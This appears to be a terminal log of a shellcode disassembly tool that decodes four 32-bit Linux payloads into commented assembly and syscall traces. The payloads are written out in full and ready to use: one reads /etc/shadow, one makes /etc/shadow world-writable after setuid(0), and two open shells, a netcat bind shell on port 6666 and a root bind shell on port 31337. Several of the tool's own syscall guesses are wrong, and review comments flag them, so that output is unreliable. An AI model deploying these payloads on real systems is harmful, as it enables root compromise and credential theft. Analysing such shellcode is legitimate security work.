
disasm/reverse shellcode

  1. entropy@phiral.net:~/reverse_shellcode$ ./revsc.py -s "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x61\x64\x6f\x77\x68\x2f\x2f\x73\x68\x68\x2f\x65\x74\x63\x89\xe1\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
  2.  
  3. [*] Bits: 32
  4.  
  5. [*] Shellcode:
  6. \x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3
  7. \x50\x68\x61\x64\x6f\x77\x68\x2f\x2f\x73\x68\x68\x2f\x65\x74
  8. \x63\x89\xe1\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80
  9.  
  10. [*] Assembly:
  11.     xor    %eax,%eax                 # eax = 0; reused below as string terminator and NULL argv entry
  12.     push   %eax                      # NUL terminator for the filename string
  13.     push   $0x7461632f               # "/cat"
  14.     push   $0x6e69622f               # "/bin"  -> stack now holds "/bin/cat\0"
  15.     mov    %esp,%ebx                 # ebx = filename ("/bin/cat"), arg0 of execve
  16.     push   %eax                      # NUL terminator for the second string
  17.     push   $0x776f6461               # "adow"
  18.     push   $0x68732f2f               # "//sh"
  19.     push   $0x6374652f               # "/etc"  -> "/etc//shadow\0"
  20.     mov    %esp,%ecx                 # ecx = pointer to "/etc//shadow"
  21.     push   %eax                      # argv[2] = NULL
  22.     push   %ecx                      # argv[1] = "/etc//shadow"
  23.     push   %ebx                      # argv[0] = "/bin/cat"
  24.     mov    %esp,%ecx                 # ecx = argv (arg1 of execve)
  25.     mov    $0xb,%al                  # eax = 11 = __NR_execve (i386); only al written, upper bits already 0 from line 11
  26.     int    $0x80                     # execve("/bin/cat", argv, edx) -- edx is never written in this listing, so envp is whatever edx held at entry
  27.  
  28. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  29.  
  30. [*] Assembly Block [0xb __NR_execve]:
  31.     xor    %eax,%eax                 # eax = 0; reused below as string terminator and NULL argv entry
  32.     push   %eax                      # NUL terminator for the filename string
  33.     push   $0x7461632f               # "/cat"
  34.     push   $0x6e69622f               # "/bin"  -> stack now holds "/bin/cat\0"
  35.     mov    %esp,%ebx                 # ebx = filename ("/bin/cat"), arg0 of execve
  36.     push   %eax                      # NUL terminator for the second string
  37.     push   $0x776f6461               # "adow"
  38.     push   $0x68732f2f               # "//sh"
  39.     push   $0x6374652f               # "/etc"  -> "/etc//shadow\0"
  40.     mov    %esp,%ecx                 # ecx = pointer to "/etc//shadow"
  41.     push   %eax                      # argv[2] = NULL
  42.     push   %ecx                      # argv[1] = "/etc//shadow"
  43.     push   %ebx                      # argv[0] = "/bin/cat"
  44.     mov    %esp,%ecx                 # ecx = argv (arg1 of execve)
  45.     mov    $0xb,%al                  # eax = 11 = __NR_execve (i386); only al written, upper bits already 0 from line 31
  46.     int    $0x80                     # execve("/bin/cat", argv, edx) -- edx is never written in this listing, so envp is whatever edx held at entry
  47.  
  48. [*] Following all register values:
  49.     1 -> %eax = 0
  50.     2 -> %esp = %eax
  51.     3 -> %esp = $0x7461632f (/cat)
  52.     4 -> %esp = $0x6e69622f (/bin)
  53.     5 -> %ebx = /bin/cat
  54.     6 -> %esp = %eax
  55.     7 -> %esp = $0x776f6461 (adow)
  56.     8 -> %esp = $0x68732f2f (//sh)
  57.     9 -> %esp = $0x6374652f (/etc)
  58.     10 -> %ecx = /bin/cat /etc//shadow
  59.     11 -> %esp = %eax
  60.     12 -> %esp = %ecx
  61.     13 -> %esp = %ebx
  62.     14 -> %ecx = /bin/cat /etc//shadow  
  63.     15 -> %al = $0xb [decimal: 11 octal: 13]
  64.  
  65. [*] Register values at syscall:
  66.     stack printable: /bin/cat /etc//shadow  
  67.     %ebx is /bin/cat
  68.     %eax is 0xb
  69.     %esp is %ebx
  70.     %ecx is /bin/cat /etc//shadow  
  71.  
  72. [*] System Call Guess: execve("/bin/cat", "/bin/cat /etc//shadow")
  73.  
  74. [*] System Call Executed (approx): execve("/bin/cat", ["/bin/cat", "/etc//shadow"], [/* 0 vars */])
  75.  
  76. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  77.  
  78.  
  79.  
  80. entropy@phiral.net:~/reverse_shellcode$ ./revsc.py -s "\x31\xc0\x50\x68\x74\x63\x61\x74\x68\x6e\x2f\x6e\x65\x68\x72\x2f\x62\x69\x68\x2f\x2f\x75\x73\x89\xe3\x50\x68\x36\x36\x36\x36\x68\x2d\x6c\x74\x70\x89\xe2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x66\x68\x2d\x65\x89\xe1\x50\x51\x52\x53\x89\xe6\xb0\x0b\x89\xf1\x31\xd2\xcd\x80"
  81.  
  82. [*] Bits: 32
  83.  
  84. [*] Shellcode:
  85. \x31\xc0\x50\x68\x74\x63\x61\x74\x68\x6e\x2f\x6e\x65\x68\x72
  86. \x2f\x62\x69\x68\x2f\x2f\x75\x73\x89\xe3\x50\x68\x36\x36\x36
  87. \x36\x68\x2d\x6c\x74\x70\x89\xe2\x50\x68\x6e\x2f\x73\x68\x68
  88. \x2f\x2f\x62\x69\x66\x68\x2d\x65\x89\xe1\x50\x51\x52\x53\x89
  89. \xe6\xb0\x0b\x89\xf1\x31\xd2\xcd\x80
  90.  
  91. [*] Assembly:
  92.     xor    %eax,%eax                 # eax = 0; used as terminator / NULL below
  93.     push   %eax                      # NUL terminator
  94.     push   $0x74616374               # "tcat"
  95.     push   $0x656e2f6e               # "n/ne"
  96.     push   $0x69622f72               # "r/bi"
  97.     push   $0x73752f2f               # "//us"  -> "//usr/bin/netcat\0"
  98.     mov    %esp,%ebx                 # ebx = filename (arg0 of execve)
  99.     push   %eax                      # NUL terminator
  100.     push   $0x36363636              # "6666"
  101.     push   $0x70746c2d              # "-ltp"  -> "-ltp6666\0"
  102.     mov    %esp,%edx                # edx = pointer to "-ltp6666" (temporarily; edx is zeroed again at line 115)
  103.     push   %eax                     # NUL terminator
  104.     push   $0x68732f6e              # "n/sh"
  105.     push   $0x69622f2f              # "//bi"
  106.     pushw  $0x652d                  # "-e": a 2-byte push, so no padding bytes land inside the string -> "-e//bin/sh\0"
  107.     mov    %esp,%ecx                # ecx = pointer to "-e//bin/sh" (note esp is now only 2-byte aligned)
  108.     push   %eax                     # argv[3] = NULL
  109.     push   %ecx                     # argv[2] = "-e//bin/sh"
  110.     push   %edx                     # argv[1] = "-ltp6666"
  111.     push   %ebx                     # argv[0] = "//usr/bin/netcat"
  112.     mov    %esp,%esi                # esi = argv
  113.     mov    $0xb,%al                 # eax = 11 = __NR_execve (upper bits of eax still 0 from line 92)
  114.     mov    %esi,%ecx                # ecx = argv (arg1)
  115.     xor    %edx,%edx                # edx = NULL envp (arg2)
  116.     int    $0x80                    # execve("//usr/bin/netcat", argv, NULL)
  117.  
  118. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  119.  
  120. [*] Assembly Block [0xb __NR_execve]:
  121.     xor    %eax,%eax                # eax = 0; used as terminator / NULL below
  122.     push   %eax                     # NUL terminator
  123.     push   $0x74616374              # "tcat"
  124.     push   $0x656e2f6e              # "n/ne"
  125.     push   $0x69622f72              # "r/bi"
  126.     push   $0x73752f2f              # "//us"  -> "//usr/bin/netcat\0"
  127.     mov    %esp,%ebx                # ebx = filename (arg0 of execve)
  128.     push   %eax                     # NUL terminator
  129.     push   $0x36363636              # "6666"
  130.     push   $0x70746c2d              # "-ltp"  -> "-ltp6666\0"
  131.     mov    %esp,%edx                # edx = pointer to "-ltp6666" (temporarily; edx is zeroed again at line 144)
  132.     push   %eax                     # NUL terminator
  133.     push   $0x68732f6e              # "n/sh"
  134.     push   $0x69622f2f              # "//bi"
  135.     pushw  $0x652d                  # "-e": a 2-byte push, so no padding bytes land inside the string -> "-e//bin/sh\0"
  136.     mov    %esp,%ecx                # ecx = pointer to "-e//bin/sh" (note esp is now only 2-byte aligned)
  137.     push   %eax                     # argv[3] = NULL
  138.     push   %ecx                     # argv[2] = "-e//bin/sh"
  139.     push   %edx                     # argv[1] = "-ltp6666"
  140.     push   %ebx                     # argv[0] = "//usr/bin/netcat"
  141.     mov    %esp,%esi                # esi = argv
  142.     mov    $0xb,%al                 # eax = 11 = __NR_execve (upper bits of eax still 0 from line 121)
  143.     mov    %esi,%ecx                # ecx = argv (arg1)
  144.     xor    %edx,%edx                # edx = NULL envp (arg2)
  145.     int    $0x80                    # execve("//usr/bin/netcat", argv, NULL)
  146.  
  147. [*] Following all register values:
  148.     1 -> %eax = 0
  149.     2 -> %esp = %eax
  150.     3 -> %esp = $0x74616374 (tcat)
  151.     4 -> %esp = $0x656e2f6e (n/ne)
  152.     5 -> %esp = $0x69622f72 (r/bi)
  153.     6 -> %esp = $0x73752f2f (//us)
  154.     7 -> %ebx = //usr/bin/netcat
  155.     8 -> %esp = %eax
  156.     9 -> %esp = $0x36363636 (6666)
  157.     10 -> %esp = $0x70746c2d (-ltp)
  158.     11 -> %edx = //usr/bin/netcat -ltp6666
  159.     12 -> %esp = %eax
  160.     13 -> %esp = $0x68732f6e (n/sh)
  161.     14 -> %esp = $0x69622f2f (//bi)
  162.     15 -> %esp = $0x652d (-e)
  163.     16 -> %ecx = //usr/bin/netcat -ltp6666 -e//bin/sh
  164.     17 -> %esp = %eax
  165.     18 -> %esp = %ecx
  166.     19 -> %esp = %edx
  167.     20 -> %esp = %ebx
  168.     21 -> %esi = //usr/bin/netcat -ltp6666 -e//bin/sh  
  169.     22 -> %al = $0xb [decimal: 11 octal: 13]
  170.     23 -> %ecx = %esi
  171.     24 -> %edx = 0
  172.  
  173. [*] Register values at syscall:
  174.     stack printable: //usr/bin/netcat -ltp6666 -e//bin/sh  
  175.     %eax is 0xb
  176.     %ebx is //usr/bin/netcat
  177.     %esi is //usr/bin/netcat -ltp6666 -e//bin/sh  
  178.     %ecx is %esi
  179.     %edx is 0
  180.     %esp is %ebx
  181.  
  182. [*] System Call Guess: execve("//usr/bin/netcat", "//usr/bin/netcat -ltp6666 -e//bin/sh", 0)
  183.  
  184. [*] System Call Executed (approx): execve("//usr/bin/netcat", ["//usr/bin/netcat", "-ltp6666", "-e//bin/sh"], [/* 0 vars */])
  185.  
  186. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  187.  
  188.  
  189. entropy@phiral.net:~/reverse_shellcode$ ./revsc.py -s "\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x61\x64\x6f\x77\x68\x63\x2f\x73\x68\x68\x2f\x2f\x65\x74\x89\xe3\x66\xb9\xb6\x01\xb0\x0f\xcd\x80\x40\xcd\x80"
  190.  
  191. [*] Bits: 32
  192.  
  193. [*] Shellcode:
  194. \x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x61\x64\x6f\x77\x68
  195. \x63\x2f\x73\x68\x68\x2f\x2f\x65\x74\x89\xe3\x66\xb9\xb6\x01
  196. \xb0\x0f\xcd\x80\x40\xcd\x80
  197.  
  198. [*] Assembly:
  199.     xor    %ebx,%ebx                # ebx = 0 (uid argument)
  200.     mov    $0x17,%al                # eax = 23 = __NR_setuid -- only al is written; assumes the upper bits of eax are already 0 at entry (not established here)
  201.     int    $0x80                    # setuid(0)
  202.     xor    %eax,%eax                # eax = 0 (also discards setuid's return value)
  203.     push   %eax                     # NUL terminator
  204.     push   $0x776f6461              # "adow"
  205.     push   $0x68732f63              # "c/sh"
  206.     push   $0x74652f2f              # "//et"  -> "//etc/shadow\0"
  207.     mov    %esp,%ebx                # ebx = path (arg0 of chmod)
  208.     mov    $0x1b6,%cx               # cx = 0x1b6 = 0666 octal = mode; only the low 16 bits of ecx are written, upper bits unknown here
  209.     mov    $0xf,%al                 # eax = 15 = __NR_chmod
  210.     int    $0x80                    # chmod("//etc/shadow", 0666)
  211.     inc    %eax                     # eax = chmod's return + 1 -- equals 1 = __NR_exit only when chmod returned 0; on failure a different syscall number results
  212.     int    $0x80                    # presumably exit(); ebx still holds the path pointer, so the exit status is its low byte -- verify intent
  213.  
  214. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  215.  
  216. [*] Assembly Block [0x17 __NR_setuid]:
  217.     xor    %ebx,%ebx                # ebx = 0 (uid argument)
  218.     mov    $0x17,%al                # eax = 23 = __NR_setuid -- only al is written; assumes the upper bits of eax are already 0 at entry (not established here)
  219.     int    $0x80                    # setuid(0)
  220.  
  221. [*] Following all register values:
  222.     1 -> %ebx = 0
  223.     2 -> %al = $0x17 [decimal: 23 octal: 27]
  224.  
  225. [*] Register values at syscall:
  226.     %ebx is 0
  227.     %al is 0x17
  228.  
  229. [*] System Call Guess: setuid(0)
  230.  
  231. [*] System Call Executed (approx): setuid(0)
  232.  
  233. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  234. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  235.  
  236. [*] Assembly Block [0xf __NR_chmod]:
  237.     xor    %eax,%eax                # eax = 0
  238.     push   %eax                     # NUL terminator
  239.     push   $0x776f6461              # "adow"
  240.     push   $0x68732f63              # "c/sh"
  241.     push   $0x74652f2f              # "//et"  -> "//etc/shadow\0"
  242.     mov    %esp,%ebx                # ebx = path (arg0 of chmod)
  243.     mov    $0x1b6,%cx               # cx = 0x1b6 = 0666 octal = mode; only the low 16 bits of ecx are written, upper bits unknown here
  244.     mov    $0xf,%al                 # eax = 15 = __NR_chmod (upper bits of eax are 0 from line 237)
  245.     int    $0x80                    # chmod("//etc/shadow", 0666)
  246.  
  247. [*] Following all register values:
  248.     1 -> %eax = 0
  249.     2 -> %esp = %eax
  250.     3 -> %esp = $0x776f6461 (adow)
  251.     4 -> %esp = $0x68732f63 (c/sh)
  252.     5 -> %esp = $0x74652f2f (//et)
  253.     6 -> %ebx = //etc/shadow
  254.     7 -> %cx = $0x1b6 [decimal: 438 octal: 666]
  255.     8 -> %al = $0xf [decimal: 15 octal: 17]
  256.  
  257. [*] Register values at syscall:
  258.     stack printable: //etc/shadow
  259.     %ebx is //etc/shadow
  260.     %eax is 0xf
  261.     %esp is 0x74652f2f
  262.     %cx is 0x1b6
  263.  
  264. [*] System Call Guess: chmod("//etc/shadow")
  265.  
  266. [*] System Call Executed (approx): chmod("//etc/shadow", 0666)
  267.  
  268. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  269.  
  270.  
  271. entropy@phiral.net:~$ ./revsc.old.py -s "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
  272.  
  273. [*] Bits: 32
  274.  
  275. [*] Shellcode:
  276. \x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53
  277. \x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a
  278. \x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66
  279. \xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0
  280. \x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8
  281. \x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80
  282.  
  283. [*] Assembly:
  284.     xor    %eax,%eax                # eax = 0
  285.     xor    %ebx,%ebx                # ebx = 0 (uid argument)
  286.     mov    $0x17,%al                # eax = 23 = __NR_setuid
  287.     int    $0x80                    # setuid(0)
  288.     xor    %ebx,%ebx                # ebx = 0
  289.     mul    %ebx                     # edx:eax = eax*0 -> eax = 0 and edx = 0 (edx is relied on later)
  290.     mov    $0x66,%al                # eax = 102 = __NR_socketcall
  291.     push   %ebx                     # args[2] = protocol = 0
  292.     inc    %ebx                     # ebx = 1
  293.     push   %ebx                     # args[1] = type = 1 (SOCK_STREAM)
  294.     inc    %ebx                     # ebx = 2
  295.     push   %ebx                     # args[0] = domain = 2 (AF_INET)
  296.     mov    %esp,%ecx                # ecx = &args = {2, 1, 0}
  297.     dec    %ebx                     # ebx = 1 = SYS_SOCKET (socketcall subcode)
  298.     int    $0x80                    # socketcall(SYS_SOCKET, args) -> eax = listening socket fd
  299.     mov    %eax,%edi                # edi = sockfd, kept across the following calls
  300.     push   %edx                     # sin_addr = 0 (INADDR_ANY); edx is still 0 from line 289
  301.     pushw  $0x697a                  # sin_port = bytes 7a 69 = 31337 in network byte order
  302.     inc    %ebx                     # ebx = 2
  303.     push   %bx                      # sin_family = 2 (AF_INET) -> esp now points at an 8-byte sockaddr_in
  304.     mov    %esp,%ecx                # ecx = &sockaddr
  305.     mov    $0x10,%al                # eax = 16 = addrlen (upper bits of eax are the high bytes of sockfd; assumes fd < 256)
  306.     push   %eax                     # args[2] = addrlen = 16
  307.     push   %ecx                     # args[1] = &sockaddr
  308.     push   %edi                     # args[0] = sockfd
  309.     mov    %esp,%ecx                # ecx = &args = {sockfd, &sockaddr, 16}
  310.     mov    $0x66,%al                # eax = __NR_socketcall
  311.     int    $0x80                    # socketcall(SYS_BIND=2, args): bind(sockfd, &sockaddr, 16) -- the tool's "socket(PF_UNSPEC, ...)" guess further down misreads this block
  312.     mov    $0x66,%al                # eax = __NR_socketcall (assumes bind returned 0 so the upper bytes are clear)
  313.     mov    $0x4,%bl                 # ebx = 4 = SYS_LISTEN
  314.     int    $0x80                    # listen(sockfd, backlog): ecx still points at the bind args, so backlog = &sockaddr reinterpreted as an int
  315.     push   %eax                     # args[2] = 0 (assumes listen returned 0)
  316.     push   %eax                     # args[1] = 0
  317.     push   %edi                     # args[0] = sockfd
  318.     mov    %esp,%ecx                # ecx = &args = {sockfd, NULL, NULL}
  319.     inc    %ebx                     # ebx = 5 = SYS_ACCEPT
  320.     mov    $0x66,%al                # eax = __NR_socketcall
  321.     int    $0x80                    # accept(sockfd, NULL, NULL) -> eax = connected client fd
  322.     mov    %ebx,%ecx                # ecx = 5, loop counter for the dup2 loop below
  323.     mov    %eax,%ebx                # ebx = client fd (arg0 of dup2)
  324.     mov    $0x3f,%al                # eax = 63 = __NR_dup2 (assumes the fd / previous return in eax is < 256); this is the loop target at offset 0x43
  325.     dec    %ecx                     # ecx = target fd: 4, 3, 2, 1, 0 across iterations
  326.     int    $0x80                    # dup2(clientfd, ecx) -- redirects fds 0..4 of this process to the socket
  327.     inc    %ecx                     # restore the counter clobbered as the dup2 argument
  328.     loop   0x43                     # ecx--; while ecx != 0 jump back to the "mov $0x3f,%al" at offset 0x43
  329.     push   %ecx                     # ecx = 0 here: NUL terminator for the string
  330.     push   $0x68732f6e              # "n/sh"
  331.     push   $0x69622f2f              # "//bi"  -> "//bin/sh\0"
  332.     mov    %esp,%ebx                # ebx = filename
  333.     push   %ecx                     # argv[1] = NULL
  334.     push   %ebx                     # argv[0] = "//bin/sh"
  335.     mov    %esp,%ecx                # ecx = argv
  336.     mov    $0xb,%al                 # eax = 11 = __NR_execve (last dup2 returned 0 so upper bits are clear)
  337.     int    $0x80                    # execve("//bin/sh", argv, edx) -- edx presumably still 0 from line 289; nothing in the listing writes it
  338.  
  339. [*] Assembly Block [0x17 __NR_setuid]:
  340.     xor    %eax,%eax                # eax = 0
  341.     xor    %ebx,%ebx                # ebx = 0 (uid argument)
  342.     mov    $0x17,%al                # eax = 23 = __NR_setuid
  343.     int    $0x80                    # setuid(0)
  344. [*] System Call (approximate): setuid(0)
  345.  
  346. [*] Assembly Block [0x66 __NR_socketcall]:
  347.     xor    %ebx,%ebx                # ebx = 0
  348.     mul    %ebx                     # edx:eax = eax*0 -> eax = 0 and edx = 0
  349.     mov    $0x66,%al                # eax = 102 = __NR_socketcall
  350.     push   %ebx                     # args[2] = protocol = 0
  351.     inc    %ebx                     # ebx = 1
  352.     push   %ebx                     # args[1] = type = 1 (SOCK_STREAM)
  353.     inc    %ebx                     # ebx = 2
  354.     push   %ebx                     # args[0] = domain = 2 (AF_INET)
  355.     mov    %esp,%ecx                # ecx = &args = {2, 1, 0}
  356.     dec    %ebx                     # ebx = 1 = SYS_SOCKET (socketcall subcode)
  357.     int    $0x80                    # socketcall(SYS_SOCKET, args) -> eax = socket fd
  358. [*] System Call (approximate): socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
  359.  
  360. [*] Assembly Block [0x66 __NR_socketcall]:
  361.     mov    %eax,%edi                # edi = fd returned by the preceding socketcall (assumed: eax is that return value on entry)
  362.     push   %edx                     # sin_addr = edx -- presumably 0 (INADDR_ANY) from the mul in the preceding block; not set in this block
  363.     pushw  $0x697a                  # sin_port = bytes 7a 69 = 31337 in network byte order
  364.     inc    %ebx                     # assuming ebx = 1 on entry (as left by the preceding block), ebx = 2 = AF_INET and also SYS_BIND
  365.     push   %bx                      # sin_family = 2 -> esp now points at an 8-byte sockaddr_in
  366.     mov    %esp,%ecx                # ecx = &sockaddr
  367.     mov    $0x10,%al                # eax = 16 = addrlen (assumes the fd in eax was < 256)
  368.     push   %eax                     # args[2] = 16
  369.     push   %ecx                     # args[1] = &sockaddr
  370.     push   %edi                     # args[0] = sockfd
  371.     mov    %esp,%ecx                # ecx = &args = {sockfd, &sockaddr, 16}
  372.     mov    $0x66,%al                # eax = __NR_socketcall
  373.     int    $0x80                    # NOTE(review): with ebx = 2 this is socketcall(SYS_BIND, args) = bind(sockfd, &sockaddr, 16); the tool's "socket(PF_UNSPEC, ...)" guess below does not match the pushed arguments
  374. [*] System Call (approximate): socket(PF_UNSPEC, SOCK_CLOEXEC|0xffa0b778, 16)
  375.  
  376. [*] Assembly Block [0x66 __NR_socketcall]:
  377.     mov    $0x66,%al                # eax = __NR_socketcall (assumes upper bytes of eax are 0, i.e. the previous call returned 0)
  378.     mov    $0x4,%bl                 # ebx = 4 = SYS_LISTEN
  379.     int    $0x80                    # listen(args[0], args[1]) with ecx carried over unchanged from the preceding block; the tool's "listen(0, 0)" guess assumes zeroed arguments, which this block does not establish
  380. [*] System Call (approximate): listen(0, 0)
  381.  
  382. [*] Assembly Block [0x66 __NR_socketcall]:
  383.     push   %eax                     # args[2] = eax (presumably 0 if the preceding listen succeeded)
  384.     push   %eax                     # args[1] = eax
  385.     push   %edi                     # args[0] = edi (the socket fd saved earlier, per the surrounding blocks)
  386.     mov    %esp,%ecx                # ecx = &args = {edi, eax, eax}
  387.     inc    %ebx                     # assuming ebx = 4 on entry, ebx = 5 = SYS_ACCEPT
  388.     mov    $0x66,%al                # eax = __NR_socketcall
  389.     int    $0x80                    # NOTE(review): reads as accept(sockfd, NULL, NULL), not the socket() the tool guesses below; eax = client fd
  390. [*] System Call (approximate): socket(PF_UNSPEC, 0, 0)
  391.  
  392. [*] Assembly Block [0x3f __NR_dup2]:
  393.     mov    %ebx,%ecx                # ecx = ebx (the socketcall subcode left by the preceding block, presumably 5) -> used as a loop counter
  394.     mov    %eax,%ebx                # ebx = eax (client fd returned by the preceding call), arg0 of dup2
  395.     mov    $0x3f,%al                # eax = 63 = __NR_dup2 (assumes the fd in eax was < 256)
  396.     dec    %ecx                     # ecx = target fd
  397.     int    $0x80                    # dup2(clientfd, ecx); the tool's "4294967295" reflects a starting ecx of 0, which the preceding block does not support
  398. [*] System Call (approximate): dup2(0, 4294967295)
  399.  
  400. [*] Assembly Block [0xb __NR_execve]:
  401.     inc    %ecx                     # restore the counter used as the dup2 argument
  402.     loop   0x43                     # ecx--; while ecx != 0 jump back to offset 0x43 -- this back-edge belongs to the dup2 loop above, the tool's block split places it here
  403.     push   %ecx                     # ecx = 0 when the loop exits: NUL terminator
  404.     push   $0x68732f6e              # "n/sh"
  405.     push   $0x69622f2f              # "//bi"  -> "//bin/sh\0"
  406.     mov    %esp,%ebx                # ebx = filename
  407.     push   %ecx                     # argv[1] = NULL
  408.     push   %ebx                     # argv[0] = "//bin/sh"
  409.     mov    %esp,%ecx                # ecx = argv
  410.     mov    $0xb,%al                 # eax = 11 = __NR_execve (assumes the last dup2 returned a value < 256)
  411.     int    $0x80                    # execve("//bin/sh", argv, edx) -- edx is not written in this block; envp is whatever it holds
  412.  
  413. ...